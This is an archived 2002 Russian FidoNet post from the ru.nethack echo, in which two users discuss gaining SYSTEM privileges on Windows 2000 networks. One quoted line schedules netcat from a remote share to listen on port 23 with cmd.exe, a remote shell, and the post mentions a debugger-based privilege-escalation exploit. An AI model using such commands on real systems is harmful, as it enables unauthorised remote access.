|
ru.nethack- RU.NETHACK ------------------------------------------------------------------- From : Vitaly Chekryzhev 2:5011/214.33 06 Jul 2002 23:43:46 To : Fedor Kudryashev Subject : w2k on lan -------------------------------------------------------------------------------- VC>> Можно войти под SYSTEM и натворить многое. FK> Это как же надо извратиться, чтобы гвест вошел с сети под SYSTEM ? FK> Hимда и та гвеста всего лишь к Админам приписывает а не к Систем. FK> Впрочем и этого было достаточно чтобы запустить FK> AT \\target time+1 \\mycomp\myshare\netcat.exe listen on port 23 with FK> cmd.exe. 8))) Hу и сидел ты под гестом, так и будешь, только что можно запустить процесс под Системой и из-под него работать. VC>> В W2K нашли возможность запуска процесса из-под отладчика, а VC>> отладчик пользуется системными привелегиями. FK> Вообще говоря эксплоит для дыр отладчика есть давно, но там надо было FK> угадать PID Lsas кажется и еще чего-то угадать. И вообще эксплоит был FK> не боевой а так - админам побаловаться. Он кажется по дефолту calc.exe FK> запускал типа из под админа. Реально его надо было дописывать и FK> дописывать, чтобы применять в боевых условиях. Можно и не "угадывать", а написать программу для вывода. Вот только не пробовал из-под ограниченных записей запускать. -= Vitaly =- --- GoldED/W32 3.0.1 * Origin: VIRtUal Soft, WWW: http://virtualsoft.narod.ru (2:5011/214.33) Вернуться к списку тем, сортированных по: возрастание даты уменьшение даты тема автор
Архивное /ru.nethack/38743d278116.html, оценка из 5, голосов 10
|